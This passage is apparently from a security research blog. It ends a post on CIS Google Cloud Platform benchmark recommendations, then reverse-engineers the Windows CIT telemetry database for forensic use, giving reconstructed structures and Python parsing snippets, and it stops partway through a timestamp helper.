One of the most often used services after Compute Engine is Cloud Storage, whose buckets often hold sensitive data. More often than not, the principle of least privilege is not applied and either “allAuthenticatedUsers” or “allUsers” has access to a storage bucket. In addition, the available access and administrative modification logs play a big role in a successful security incident investigation.
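A bucket-level version of this check can be sketched in the same way, reading the JSON policy printed by `gsutil iam get gs://BUCKET_NAME`. The helper name `public_bindings` is hypothetical, and the sample policy is made up.

```python
# Special member identifiers that make a bucket public or near-public.
PUBLIC_MEMBERS = {"allUsers", "allAuthenticatedUsers"}

def public_bindings(bucket_policy: dict):
    """Return (role, member) pairs that grant access to anonymous or any authenticated users."""
    return [(binding["role"], member)
            for binding in bucket_policy.get("bindings", [])
            for member in binding.get("members", [])
            if member in PUBLIC_MEMBERS]

# Made-up sample policy for illustration.
sample_bucket_policy = {
    "bindings": [
        {"role": "roles/storage.objectViewer",
         "members": ["allUsers", "user:bob@example.com"]},
        {"role": "roles/storage.admin", "members": ["group:admins@example.com"]},
    ]
}
exposed = public_bindings(sample_bucket_policy)
```

An empty result means no binding in the bucket's IAM policy names either public member. Legacy object ACLs are not covered by this sketch, which is one reason uniform bucket-level access is worth enabling.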

The CIS Benchmark has the following recommendations for Cloud Storage Bucket:

  • Ensure That Cloud Storage Bucket Is Not Anonymously or Publicly Accessible
  • Ensure That Cloud Storage Buckets Have Uniform Bucket-Level Access Enabled
  • Ensure That Cloud Audit Logging Is Configured Properly Across All Services and All Users From a Project

The CIS Google Cloud Platform Foundation Benchmark splits the recommendation into several items here, but in the end they amount to the same as in the ten best practices.

Compute Engine

The most used service is Compute Engine, which handles application configurations and customer data. One might expect it to receive the greatest security focus, but instances were still identified without snapshots, which would enable data disk recovery if an application or virtual machine crash corrupted data.

The CIS Benchmark has the following recommendations for Compute Engine:

  • Ensure That Instances Are Not Configured To Use the Default Service Account
  • Ensure That Instances Are Not Configured To Use the Default Service Account With Full Access to All Cloud APIs
  • Ensure “Block Project-Wide SSH Keys” Is Enabled for VM Instances
  • Ensure Oslogin Is Enabled for a Project
  • Ensure ‘Enable Connecting to Serial Ports’ Is Not Enabled for VM Instance
  • Ensure That IP Forwarding Is Not Enabled on Instances
  • Ensure VM Disks for Critical VMs Are Encrypted With Customer-Supplied Encryption Keys (CSEK)
  • Ensure Compute Instances Are Launched With Shielded VM Enabled
  • Ensure That Compute Instances Do Not Have Public IP Addresses
  • Ensure That App Engine Applications Enforce HTTPS Connections
  • Ensure That Compute Instances Have Confidential Computing Enabled
  • Ensure the Latest Operating System Updates Are Installed On Your Virtual Machines in All Projects

Here the CIS benchmark puts more emphasis on the hardening side of instance security: using built-in security features, limiting access to the virtual machines and securing the communication channels. Interestingly, enabling backups or snapshots is not in the list of recommendations. This will probably be in the next release, as the benchmark is constantly revised to contain the latest information.

Cloud SQL

Relational databases are another service used by many companies. Unfortunately, Cloud SQL instances are often found without any way to recover lost data, and are therefore exposed to the risk of data loss.

The CIS Benchmark has the following recommendations for Cloud SQL:

  • Ensure That the Cloud SQL Database Instance Requires All Incoming Connections To Use SSL
  • Ensure That Cloud SQL Database Instances Do Not Implicitly Whitelist All Public IP Addresses
  • Ensure That Cloud SQL Database Instances Do Not Have Public IPs
  • Ensure That Cloud SQL Database Instances Are Configured With Automated Backups
  • Ensure That Cloud Audit Logging Is Configured Properly Across All Services and All Users From a Project

In addition to the automatic backup recommendation, we can see in the list that additional network access and secure communication channel related security controls are mentioned.

Logging and Monitoring

In general, enabling audit logging will provide exceptional value during security incident investigation and allow creating alerts that could be the first signal of an ongoing attack. Alerts will notify the cloud administrators and security people in case of administrative changes in multiple services.

The CIS Benchmark has the following recommendations for Logging and Monitoring:

  • Ensure That Cloud Audit Logging Is Configured Properly Across All Services and All Users From a Project
  • Ensure That Sinks Are Configured for All Log Entries
  • Ensure Log Metric Filter and Alerts Exist for Project Ownership Assignments/Changes
  • Ensure That the Log Metric Filter and Alerts Exist for Audit Configuration Changes
  • Ensure That the Log Metric Filter and Alerts Exist for Custom Role Changes
  • Ensure That the Log Metric Filter and Alerts Exist for VPC Network Firewall Rule Changes
  • Ensure That the Log Metric Filter and Alerts Exist for VPC Network Route Changes
  • Ensure That the Log Metric Filter and Alerts Exist for VPC Network Changes
  • Ensure That the Log Metric Filter and Alerts Exist for Cloud Storage IAM Permission Changes
  • Ensure That the Log Metric Filter and Alerts Exist for SQL Instance Configuration Changes
  • Ensure That Cloud DNS Logging Is Enabled for All VPC Networks

Here the CIS Google Cloud Platform Foundation Benchmark emphasizes log metric filters with alerts on permission, modification and configuration changes related to specific services, in addition to general audit logging across all services.

Conclusion

In conclusion, the new CIS Google Cloud Platform Foundation Benchmark offers powerful best practices that companies can introduce to improve the baseline security of their GCP deployments – and furthermore, these best practices can help to mitigate many of the most common security issues we find in real-world environments during our security testing. As we have seen before with the CIS Microsoft 365 Foundation Benchmark, these benchmarks offer plenty of recommendations that a company can start with and apply to prevent the most common mistakes and misconfigurations before moving on to more advanced security controls and defenses in the cloud environment.

References

[1] CIS Google Cloud Platform Foundation Benchmark: https://www.cisecurity.org/benchmark/google_cloud_computing_platform

[2] Securing Google Cloud Platform – Ten best practices: https://research.nccgroup.com/2018/10/12/securing-google-cloud-platform-ten-best-practices/

[3] Shaking The Foundation of An Online Collaboration Tool: Microsoft 365 Top 5 Attacks vs the CIS Microsoft 365 Foundation Benchmark: https://research.nccgroup.com/2022/02/18/shaking-the-foundation-of-an-online-collaboration-tool-microsoft-365-top-5-attacks-vs-the-cis-microsoft-365-foundation-benchmark/

A brief look at Windows telemetry: CIT aka Customer Interaction Tracker

12 April 2022 at 14:06

tl;dr

  • Windows versions up to at least Windows 7 contain a telemetry source called Customer Interaction Tracker (CIT)
  • The CIT database can be parsed to aid forensic investigation
  • We also provide code to parse the CIT database yourself. We have implemented all of these findings in our investigation framework, which enables us to use them on all types of evidence data that we encounter.

Introduction

About 2 years ago while I was working on a large compromise assessment, I had extra time available to do a little research. For a compromise assessment, we take a forensic snapshot of everything that is in scope. This includes various log or SIEM sources, but also includes a lot of host data. This host data can vary from full disk images, such as those from virtual machines, to smaller, forensically acquired, evidence packages. During this particular compromise assessment, we had host data from about 10,000 machines. An excellent opportunity for large scale data analysis, but also a huge set of data to test new parsers on, or find less common edge cases for existing parsers! During these assignments we generally also take some time to look for new and interesting pieces of data to analyse. We don’t often have access to such a large and varied dataset, so we take advantage of it while we can.

Around this time I also happened to stumble upon the excellent blog posts from Maxim Suhanov over at dfir.ru. Something that caught my eye was his post about the CIT database in Windows. It may or may not stand for “Customer Interaction Tracker” and is one of the telemetry systems that exist within Windows, responsible for tracking interaction with the system and applications. I’d never heard of it before, and it seemed relatively unknown as his post was just about the only reference I could find about it. This, of course, piqued my interest, as it’s more fun exploring new and unknown data sources than well documented ones. And since I now had access to about 10k hosts, it seemed like as good a time as any to see if I could explore a little bit further than he had.

While Maxim does hypothesise about the purpose of the CIT database, he doesn’t describe much about how it is structured. It’s an LZNT1 compressed blob stored in the Windows registry at HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\System that, when decompressed, has some executable paths in there. Nothing seems to be known about how to parse this binary blob. So-called “grep forensics”, while having its place, doesn’t scale, and you might be missing crucial pieces of information from the unparsed data. I’m also someone who takes comfort in knowing exactly how something is structured, without too many hypotheses and guesses.

In my large dataset I had plenty of CIT databases, so I could compare them and possibly spot patterns on how to parse this blob, so that’s exactly what I set out to do. Fast iteration with dissect.cstruct and a few hours of eyeballing hexdumps later, I came up with some structures on how I thought the data might be stored.

struct header {
uint16 unk0;
uint16 unk1;
uint32 size;
uint64 timestamp;
uint64 unk2;
uint32 num_entry1;
uint32 entry1_offset;
uint32 block1_size;
uint32 block1_offset;
uint32 num_entry2;
uint32 entry2_offset;
uint64 timestamp2;
uint64 timestamp3;
uint32 unk9;
uint32 unk10;
uint32 unk11;
uint32 unk12;
uint32 unk13;
uint32 unk14;
};
// <snip>
struct entry1 {
uint32 entry3_offset;
uint32 entry2_offset;
uint32 entry3_size;
uint32 entry2_size;
};
// <snip>
struct entry3 {
uint32 path_offset;
uint32 unk0;
uint32 unk1;
uint32 unk2;
uint32 unk3;
uint32 unk4;
uint32 unk5;
};

While still incredibly rough, I figured I had a rudimentary understanding of how the CIT was stored. However, at the time it was hardly a practical improvement over just “extracting the strings”, except perhaps that the parsing was a bit more efficient. It did scratch my initial itch on figuring out how it might be stored, but I didn’t want to spend a lot more time on it at the time. I added it as a plugin in our investigation framework called dissect, ran it over all the host data we had and used it as an additional source of information during the remainder of the compromise assessment. I figured I’d revisit it some other time.

Revisiting

Some other time turned out to be a lot farther into the future than I had anticipated. On an uneventful Friday afternoon a few weeks ago, at the time of writing, and 2 years after my initial look, I figured I’d give the CIT another shot. This time I’d go about it with my usual approach, given that I had more time available now. That approach roughly consists of finding whatever DLL, driver or part of the Windows kernel is responsible for some behaviour, reverse engineering it and writing my own implementation. This is my preferred approach if I have a bit more time available, since it leaves little room for wrong hypotheses and personal interpretation, and grounds your implementation mostly in facts.

Approach

My usual approach starts with scraping the disk of one of my virtual machines with some byte pattern, usually a string in various encodings (UTF-8 and UTF-16-LE, the default string encoding in Windows, for example) in search of files that contain those strings or byte patterns. For this we can utilize our dissect framework that, among its many capabilities, allows us to easily search for occurrences of data within any data container, such as (sparse) VMDK files or other types of disk images. We can combine this with a filesystem parser to see if a hit is within the dataruns of a file, and report which files have hits. This process only takes a few minutes and I immediately get an overview of all the files on my entire filesystem that may have a reference to something I’m looking for.
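As a rough illustration of the search step, the sketch below scans a raw byte buffer for one string in both encodings. It works on an in-memory bytes object rather than a disk image, and find_encoded is a hypothetical helper name, not part of dissect.

```python
def find_encoded(haystack: bytes, needle: str, encodings=("utf-8", "utf-16-le")):
    """Yield (encoding, offset) for every occurrence of needle in haystack."""
    for encoding in encodings:
        pattern = needle.encode(encoding)
        offset = haystack.find(pattern)
        while offset != -1:
            yield encoding, offset
            offset = haystack.find(pattern, offset + 1)


# Synthetic buffer holding the same string once per encoding (not real disk data).
needle = "AppCompatFlags\\CIT"
blob = b"\x00" * 16 + needle.encode("utf-8") + b"\xff" * 8 + needle.encode("utf-16-le")
hits = list(find_encoded(blob, needle))
```

On a real image, each hit offset would then be mapped back to a file through the filesystem parser, which this sketch does not attempt.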

In this case, I used part of the registry path where the CIT database is stored. Using this approach, I quickly found a couple of DLLs that looked interesting, but a quick inspection revealed only one that was truly of interest: generaltel.dll. This DLL, among other things, seems to be responsible for consuming the CIT database and its records, and emitting telemetry ETW messages.

Reverse engineering

Through reverse engineering the parsing code and looking at how the ETW messages are constructed, we can create some fairly complete looking structures to parse the CIT database.

typedef struct _CIT_HEADER {
WORD MajorVersion;
WORD MinorVersion;
DWORD Size; /* Size of the entire buffer */
FILETIME CurrentTimeLocal; /* Maybe the time when the saved CIT was last updated? */
DWORD Crc32; /* Crc32 of the entire buffer, skipping this field */
DWORD EntrySize;
DWORD EntryCount;
DWORD EntryDataOffset;
DWORD SystemDataSize;
DWORD SystemDataOffset;
DWORD BaseUseDataSize;
DWORD BaseUseDataOffset;
FILETIME StartTimeLocal; /* Presumably when the aggregation started */
FILETIME PeriodStartLocal; /* Presumably the starting point of the aggregation period */
DWORD AggregationPeriodInS; /* Presumably the duration over which this data was gathered
* Always 604800 (7 days) */
DWORD BitPeriodInS; /* Presumably the amount of seconds a single bit represents
* Always 3600 (1 hour) */
DWORD SingleBitmapSize; /* This appears to be the sizes of the Stats buffers, always 21 */
DWORD _Unk0; /* Always 0x00000100? */
DWORD HeaderSize;
DWORD _Unk1; /* Always 0x00000000? */
} CIT_HEADER;
typedef struct _CIT_PERSISTED {
DWORD BitmapsOffset; /* Array of Offset and Size (DWORD, DWORD) */
DWORD BitmapsSize;
DWORD SpanStatsOffset; /* Array of Count and Duration (DWORD, DWORD) */
DWORD SpanStatsSize;
DWORD StatsOffset; /* Array of WORD */
DWORD StatsSize;
} CIT_PERSISTED;
typedef struct _CIT_ENTRY {
DWORD ProgramDataOffset; /* Offset to CIT_PROGRAM_DATA */
DWORD UseDataOffset; /* Offset to CIT_PERSISTED */
DWORD ProgramDataSize;
DWORD UseDataSize;
} CIT_ENTRY;
typedef struct _CIT_PROGRAM_DATA {
DWORD FilePathOffset; /* Offset to UTF-16-LE file path string */
DWORD FilePathSize; /* strlen of string */
DWORD CommandLineOffset; /* Offset to UTF-16-LE command line string */
DWORD CommandLineSize; /* strlen of string */
DWORD PeTimeDateStamp; /* aka Extra1 */
DWORD PeCheckSum; /* aka Extra2 */
DWORD Extra3; /* aka Extra3, some flag from PROCESSINFO struct */
} CIT_PROGRAM_DATA;

When compared against the initial guessed structures, we can immediately get a feeling for the overall format of the CIT. Decompressed, the CIT is made up of a small header, a global “system use data”, a global “use data” and a bunch of entries. Each entry has its own “use data” as well as references to a file path and optional command line string.
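For readers without dissect.cstruct at hand, the header can also be read with Python’s standard struct module. This is a minimal sketch that assumes the CIT_HEADER layout shown above is packed little-endian without padding; the sample values are synthetic, and the names parse_header and cit_crc32 are made up for this example. The CRC calculation mirrors the comment in the structure: the whole buffer, skipping the Crc32 field at offset 0x10.

```python
import struct
from binascii import crc32
from collections import namedtuple

# WORD, WORD, DWORD, FILETIME, 8 DWORDs, 2 FILETIMEs, 6 DWORDs
CIT_HEADER_FORMAT = "<HHIQ8I2Q6I"

# namedtuple field names may not start with "_", so _Unk0/_Unk1 become Unk0/Unk1.
CitHeader = namedtuple("CitHeader", [
    "MajorVersion", "MinorVersion", "Size", "CurrentTimeLocal", "Crc32",
    "EntrySize", "EntryCount", "EntryDataOffset", "SystemDataSize",
    "SystemDataOffset", "BaseUseDataSize", "BaseUseDataOffset",
    "StartTimeLocal", "PeriodStartLocal", "AggregationPeriodInS",
    "BitPeriodInS", "SingleBitmapSize", "Unk0", "HeaderSize", "Unk1",
])


def parse_header(buf: bytes) -> CitHeader:
    return CitHeader._make(struct.unpack_from(CIT_HEADER_FORMAT, buf, 0))


def cit_crc32(buf: bytes) -> int:
    # CRC32 over everything except the 4-byte Crc32 field at 0x10..0x14
    return crc32(buf[0x14:], crc32(buf[:0x10]))


# Synthetic header-only buffer, for illustration only.
fields = [0x0A, 0, 88, 0, 0, 16, 0, 88, 0, 88, 0, 88, 0, 0,
          604800, 3600, 21, 0x100, 88, 0]
sample = bytearray(struct.pack(CIT_HEADER_FORMAT, *fields))
struct.pack_into("<I", sample, 0x10, cit_crc32(bytes(sample)))
header = parse_header(bytes(sample))
```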

Interpreting the data

Figuring out how to parse data is the easy part, interpreting this data is oftentimes much harder.

Looking at the structures we came up with, we have something called “use data” that contains some bitmaps, “stats” and “span stats”. Bitmaps are usually straightforward since there are only so many ways you can interpret those, but “stats” and “span stats” can mean just about anything. However, we still have the issue that the “system use data” has multiple bitmaps.

To more confidently interpret the data, it’s best we look at how it’s created. Further reverse engineering brings us to win32kbase.sys, win32kfull.sys for newer Windows versions (e.g. Windows 10+), and win32k.sys for older Windows versions (e.g. Windows 7, Server 2012).

In the CIT header, we can see a BitPeriodInS, SingleBitmapSize and AggregationPeriodInS. With some values from a real header, we can confirm that (BitPeriodInS * 8) * SingleBitmapSize = AggregationPeriodInS. We also have a PeriodStartLocal field which is usually a nicely rounded timestamp. From this, we can make a fairly confident assumption that for every bit in the bitmap, the application in the entry or the system was used within a BitPeriodInS time window. This means that the bitmaps track activity over a larger time period in some period size, by default an hour. Reverse engineered code seems to support this, too. Note that all of this is in local time, not UTC.
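The arithmetic and the bit-to-time mapping can be sketched as follows. The constants are the “always” values noted in the header comments. The bit order (least significant bit first within each byte) follows the parser in the Source section and should be treated as an assumption, as should the arbitrary start date; active_windows is a hypothetical helper name.

```python
from datetime import datetime, timedelta

BIT_PERIOD_S = 3600            # one bit covers one hour
SINGLE_BITMAP_SIZE = 21        # bytes per bitmap
AGGREGATION_PERIOD_S = 604800  # seven days

# 3600 s * 8 bits * 21 bytes = 604800 s
assert BIT_PERIOD_S * 8 * SINGLE_BITMAP_SIZE == AGGREGATION_PERIOD_S


def active_windows(bitmap: bytes, period_start: datetime, bit_period_s: int = BIT_PERIOD_S):
    """Return the start time of every bit period whose bit is set."""
    step = timedelta(seconds=bit_period_s)
    starts = []
    for byte_index, byte in enumerate(bitmap):
        for bit in range(8):
            if byte & (1 << bit):
                starts.append(period_start + (byte_index * 8 + bit) * step)
    return starts


# Naive datetime, because the CIT timestamps are local time; the date is arbitrary.
period_start = datetime(2022, 4, 4)
bitmap = bytes([0b00000101]) + bytes(20)  # activity in the first and third hour
windows = active_windows(bitmap, period_start)
```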

For the “stats” or “span stats”, it’s not that easy. We have no indication of what these values might mean, other than their integer size. The parsing code seems to suggest they might be tuples, but that may very well be a compiler optimization. We at least know they aren’t offsets, since their values are often far larger than the size of the CIT.

Further reverse engineering win32k.sys seems to suggest that the “stats” are in fact individual counters, being incremented in functions such as CitSessionConnectChange, CitDesktopSwitch, etc. These functions get called from other relevant functions in win32k.sys, like xxxSwitchDesktop that calls CitDesktopSwitch. One of the smaller increment functions can be seen below as an example:

void __fastcall CitThreadGhostingChange(tagTHREADINFO *pti)
{
  struct _CIT_USE_DATA *UseData; // rax
  __int16 v2; // cx

  if ( g_CIT_IMPACT_CONTEXT )
  {
    if ( _bittest((const signed __int32 *)&pti->TIF_flags, 0x1Fu) )
    {
      UseData = CitpProcessGetUseData(pti->ppi);
      if ( UseData )
      {
        v2 = -1;
        if ( (unsigned __int16)(UseData->Stats.ThreadGhostingChanges + 1) >= UseData->Stats.ThreadGhostingChanges )
          v2 = UseData->Stats.ThreadGhostingChanges + 1;
        UseData->Stats.ThreadGhostingChanges = v2;
      }
    }
  }
}
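
The decompiled function amounts to a saturating 16-bit increment: the counter goes up by one, but sticks at 0xFFFF instead of wrapping around to zero. A small Python rendering of just that arithmetic (the function name is made up for this sketch):

```python
def saturating_increment_u16(value: int) -> int:
    """Increment a 16-bit counter, clamping at 0xFFFF instead of wrapping."""
    incremented = (value + 1) & 0xFFFF  # emulate unsigned 16-bit wrap-around
    # If the wrapped result is smaller than the input, an overflow occurred.
    return incremented if incremented >= value else 0xFFFF
```

For forensic interpretation this means a counter value of 65535 should be read as “at least 65535”.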

The increment events are different between the system use data and the program use data. If we map these increments out to the best of our ability, we end up with the following structures:

struct _CIT_SYSTEM_DATA_STATS
{
WORD Unknown_BootIdRelated0;
WORD Unknown_BootIdRelated1;
WORD Unknown_BootIdRelated2;
WORD Unknown_BootIdRelated3;
WORD Unknown_BootIdRelated4;
WORD SessionConnects;
WORD ProcessForegroundChanges;
WORD ContextFlushes;
WORD MissingProgData;
WORD DesktopSwitches;
WORD WinlogonMessage;
WORD WinlogonLockHotkey;
WORD WinlogonLock;
WORD SessionDisconnects;
};
struct _CIT_USE_DATA_STATS
{
WORD Crashes;
WORD ThreadGhostingChanges;
WORD Input;
WORD InputKeyboard;
WORD Unknown;
WORD InputTouch;
WORD InputHid;
WORD InputMouse;
WORD MouseLeftButton;
WORD MouseRightButton;
WORD MouseMiddleButton;
WORD MouseWheel;
};

There are some interesting tracked statistics here, such as the amount of times someone logged on, locked their system, or how many times they clicked or pressed a key in an application.
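Since the “stats” are a flat array of WORD counters, a per-program stats buffer can be labelled with a few lines of Python. This sketch assumes the field order of _CIT_USE_DATA_STATS above and little-endian packing; the sample values are invented and parse_use_data_stats is a hypothetical helper.

```python
import struct

USE_DATA_STATS_FIELDS = (
    "Crashes", "ThreadGhostingChanges", "Input", "InputKeyboard", "Unknown",
    "InputTouch", "InputHid", "InputMouse", "MouseLeftButton",
    "MouseRightButton", "MouseMiddleButton", "MouseWheel",
)


def parse_use_data_stats(buf: bytes) -> dict:
    """Label twelve little-endian WORD counters with their field names."""
    values = struct.unpack_from("<12H", buf)
    return dict(zip(USE_DATA_STATS_FIELDS, values))


# Invented sample buffer, for illustration only.
sample = struct.pack("<12H", 0, 1, 250, 200, 0, 0, 0, 50, 40, 5, 0, 5)
stats = parse_use_data_stats(sample)
```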

We can see similar behaviour for “span stats”, but in this case it appears to be a pair of (count, duration). Similarly, if we map these increments out to the best of our ability, we end up with the following structures:

struct _CIT_SPAN_STAT_ITEM
{
  DWORD Count;
  DWORD Duration;
};
struct _CIT_SYSTEM_DATA_SPAN_STATS
{
  _CIT_SPAN_STAT_ITEM ContextFlushes0;
  _CIT_SPAN_STAT_ITEM Foreground0;
  _CIT_SPAN_STAT_ITEM Foreground1;
  _CIT_SPAN_STAT_ITEM DisplayPower0;
  _CIT_SPAN_STAT_ITEM DisplayRequestChange;
  _CIT_SPAN_STAT_ITEM DisplayPower1;
  _CIT_SPAN_STAT_ITEM DisplayPower2;
  _CIT_SPAN_STAT_ITEM DisplayPower3;
  _CIT_SPAN_STAT_ITEM ContextFlushes1;
  _CIT_SPAN_STAT_ITEM Foreground2;
  _CIT_SPAN_STAT_ITEM ContextFlushes2;
};
struct _CIT_USE_DATA_SPAN_STATS
{
  _CIT_SPAN_STAT_ITEM ProcessCreation0;
  _CIT_SPAN_STAT_ITEM Foreground0;
  _CIT_SPAN_STAT_ITEM Foreground1;
  _CIT_SPAN_STAT_ITEM Foreground2;
  _CIT_SPAN_STAT_ITEM ProcessSuspended;
  _CIT_SPAN_STAT_ITEM ProcessCreation1;
};
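
A “span stats” buffer can be read the same way, as consecutive (Count, Duration) DWORD pairs. The sketch below assumes the _CIT_USE_DATA_SPAN_STATS field order above; the unit of Duration is not established here, so the values are left as raw integers. The sample data and the helper name are invented.

```python
import struct

USE_DATA_SPAN_STATS_FIELDS = (
    "ProcessCreation0", "Foreground0", "Foreground1",
    "Foreground2", "ProcessSuspended", "ProcessCreation1",
)


def parse_use_data_span_stats(buf: bytes) -> dict:
    """Map each span stat name to its (count, duration) pair."""
    size = 8 * len(USE_DATA_SPAN_STATS_FIELDS)
    pairs = struct.iter_unpack("<II", buf[:size])
    return {
        name: {"count": count, "duration": duration}
        for name, (count, duration) in zip(USE_DATA_SPAN_STATS_FIELDS, pairs)
    }


# Invented sample buffer, for illustration only.
sample = struct.pack("<12I", 1, 10, 3, 120, 0, 0, 0, 0, 0, 0, 1, 10)
span_stats = parse_use_data_span_stats(sample)
```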

Finally, when looking for all references to the bitmaps, we can identify the following bitmaps stored in the “system use data”:

struct _CIT_SYSTEM_DATA_BITMAPS
{
_CIT_BITMAP DisplayPower;
_CIT_BITMAP DisplayRequestChange;
_CIT_BITMAP Input;
_CIT_BITMAP InputTouch;
_CIT_BITMAP Unknown;
_CIT_BITMAP Foreground;
};

We can also identify that the single bitmap linked to each program entry is a bitmap of “foreground” activity for the aggregation period.

In the original source, I suspect these fields are accessed by index with an enum, but mapping them to structs makes for easier reverse engineering. You can also still see some unknowns in there, or unspecified fields such as Foreground0 and Foreground1. This is because the differentiation between these is currently unclear. For example, both counters might be incremented upon a foreground switch, but only one of them when a specific flag or condition is true. The exact condition or meaning of the flag is currently unknown.

Newer Windows versions

During the reverse engineering of the various win32k modules, I noticed something disappointing: the CIT database seems to no longer exist in the same form on newer Windows versions. Some of the same code remains and some new code was introduced, but any relation to the stored CIT database as described up until now no longer seems to exist. Maybe it’s now handled somewhere else and I couldn’t find it, but I also haven’t encountered any recent Windows host that has had CIT data stored on it.

Something else seems to have taken its place, though. We have some stored DP and PUUActive (Post Update Use Info) data instead. If the running Windows version is a “multi-session SKU”, as determined by the RtlIsMultiSessionSku API, these values are stored under the key HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon. Otherwise, they are stored under HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT.

Post Update Use Info

We can apply the same technique here as we did with the older CIT database, which is to look at how ETW messages are being created from the data. A little bit of reversing later and we get the following structure:

typedef struct _CIT_POST_UPDATE_USE_INFO {
DWORD UpdateKey;
WORD UpdateCount;
WORD CrashCount;
WORD SessionCount;
WORD LogCount;
DWORD UserActiveDurationInS;
DWORD UserOrDispActiveDurationInS;
DWORD DesktopActiveDurationInS;
WORD Version;
WORD _Unk0;
WORD BootIdMin;
WORD BootIdMax;
DWORD PMUUKey;
DWORD SessionDurationInS;
DWORD SessionUptimeInS;
DWORD UserInputInS;
DWORD MouseInputInS;
DWORD KeyboardInputInS;
DWORD TouchInputInS;
DWORD PrecisionTouchpadInputInS;
DWORD InForegroundInS;
DWORD ForegroundSwitchCount;
DWORD UserActiveTransitionCount;
DWORD _Unk1;
FILETIME LogTimeStart;
QWORD CumulativeUserActiveDurationInS;
WORD UpdateCountAccumulationStarted;
WORD _Unk2;
DWORD BuildUserActiveDurationInS;
DWORD BuildNumber;
DWORD _UnkDeltaUserOrDispActiveDurationInS;
DWORD _UnkDeltaTime;
DWORD _Unk3;
} CIT_POST_UPDATE_USE_INFO;

Looks like we lost the information for individual applications, but we still get a lot of usage data.

DP

Once again we can apply the same technique, resulting in the following:

typedef struct _CIT_DP_MEMOIZATION_ENTRY {
DWORD Unk0;
DWORD Unk1;
DWORD Unk2;
} CIT_DP_MEMOIZATION_ENTRY;
typedef struct _CIT_DP_MEMOIZATION_CONTEXT {
_CIT_DP_MEMOIZATION_ENTRY Entries[12];
} CIT_DP_MEMOIZATION_CONTEXT;
typedef struct _CIT_DP_DATA {
WORD Version;
WORD Size;
WORD LogCount;
WORD CrashCount;
DWORD SessionCount;
DWORD UpdateKey;
QWORD _Unk0;
FILETIME _UnkTime;
FILETIME LogTimeStart;
DWORD ForegroundDurations[11];
DWORD _Unk1;
_CIT_DP_MEMOIZATION_CONTEXT MemoizationContext;
} CIT_DP_DATA;

I haven’t looked too deeply into the memoization shown here, but it’s largely irrelevant when parsing the data. We see some of the same fields we also saw in the PUU data, but also a ForegroundDurations array. This appears to be an array of foreground durations in milliseconds for a couple of hardcoded applications:

  • Microsoft Internet Explorer
    • IEXPLORE.EXE
  • Microsoft Edge
    • MICROSOFTEDGE.EXE, MICROSOFTEDGECP.EXE, MICROSOFTEDGEBCHOST.EXE, MICROSOFTEDGEDEVTOOLS.EXE
  • Google Chrome
    • CHROME.EXE
  • Microsoft Word
    • WINWORD.EXE
  • Microsoft Excel
    • EXCEL.EXE
  • Mozilla Firefox
    • FIREFOX.EXE
  • Microsoft Photos
    • MICROSOFT.PHOTOS.EXE
  • Microsoft Outlook
    • OUTLOOK.EXE
  • Adobe Acrobat Reader
    • ACRORD32.EXE
  • Microsoft Skype
    • SKYPE.EXE

Each application is given an index in this array, starting from 1. Index 0 appears to be reserved for a cumulative time. It is not currently known if this list of applications changes between Windows versions. It’s also not currently known what “DP” stands for.
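To make the indexing concrete, the sketch below labels the eleven DWORD values of ForegroundDurations. It assumes that the order of the list above matches the index order (1 through 10), which has not been verified against every Windows version; the sample values are invented and label_foreground_durations is a hypothetical helper.

```python
import struct

# Index 0 is the cumulative value; indexes 1..10 ASSUME the list order above.
DP_FOREGROUND_LABELS = (
    "Cumulative", "Microsoft Internet Explorer", "Microsoft Edge",
    "Google Chrome", "Microsoft Word", "Microsoft Excel", "Mozilla Firefox",
    "Microsoft Photos", "Microsoft Outlook", "Adobe Acrobat Reader",
    "Microsoft Skype",
)


def label_foreground_durations(raw: bytes) -> dict:
    """Label the DWORD ForegroundDurations[11] array (values in milliseconds)."""
    values = struct.unpack_from("<11I", raw)
    return dict(zip(DP_FOREGROUND_LABELS, values))


# Invented sample: 90 s in total, of which 60 s in Chrome and 30 s in Word.
sample = struct.pack("<11I", 90000, 0, 0, 60000, 30000, 0, 0, 0, 0, 0, 0)
durations = label_foreground_durations(sample)
```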

Other findings

While looking for some test CIT data, I stumbled upon two other pieces of information stored in the registry under the CIT registry key.

Telemetry answers

This information is stored at the registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\win32k, under a subkey of some arbitrary version number. It contains values with the value name being the ImageFileName of the process, and the value being a flag indicating what types of messages or telemetry this application received during its lifetime. For example, the POWERBROADCAST flag is set if NtUserfnPOWERBROADCAST is called on a process, which itself is called from NtUserMessageCall. This is presumably a system message sent when the power state of the system changes (e.g. a charger was plugged in). Currently known values are:

POWERBROADCAST = 0x10000
DEVICECHANGE = 0x20000
IME_CONTROL = 0x40000
WINHELP = 0x80000

You can discover which events a process received by masking the stored value with these values. For example, the value 0x30000 can be interpreted as POWERBROADCAST|DEVICECHANGE, meaning that a process received those events.
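The masking can be expressed with Python’s enum.IntFlag, as in this small sketch. Only the four known values listed above are modelled; any other bits are reported separately as unknown. The function name decode_answers is made up for this example.

```python
from enum import IntFlag


class TelemetryAnswers(IntFlag):
    POWERBROADCAST = 0x10000
    DEVICECHANGE = 0x20000
    IME_CONTROL = 0x40000
    WINHELP = 0x80000


KNOWN_MASK = 0xF0000  # all four known flags combined


def decode_answers(value: int):
    """Return (names of known flags that are set, remaining unknown bits)."""
    names = [flag.name for flag in TelemetryAnswers if value & flag]
    return names, value & ~KNOWN_MASK


names, unknown = decode_answers(0x30000)
```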

This behaviour was only present in a Windows 7 win32k.sys and seems to no longer be present in more recent Windows versions. I have also seen instances where the values 4 and 8 were used, but have not been able to find a corresponding executable that produces these values. In most win32k.sys the code for this is inlined, but in some the function name AnswerTelemetryQuestion can be seen.

Modules

Another interesting registry key is HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module. It has subkeys for certain runtime DLLs (for example, System32/mrt100.dll or Microsoft.NET/Framework64/v4.0.30319/clr.dll), and each subkey has values for applications that have loaded this module. The name of the value is once again the ImageFileName and the value is a standard Windows timestamp of when the value was written.
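A Windows timestamp (FILETIME) counts 100-nanosecond intervals since 1601-01-01 UTC, so it can be converted with a few lines of Python. The sketch assumes the registry value data is the raw 8-byte little-endian FILETIME; the helper names are made up for this example.

```python
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(filetime: int) -> datetime:
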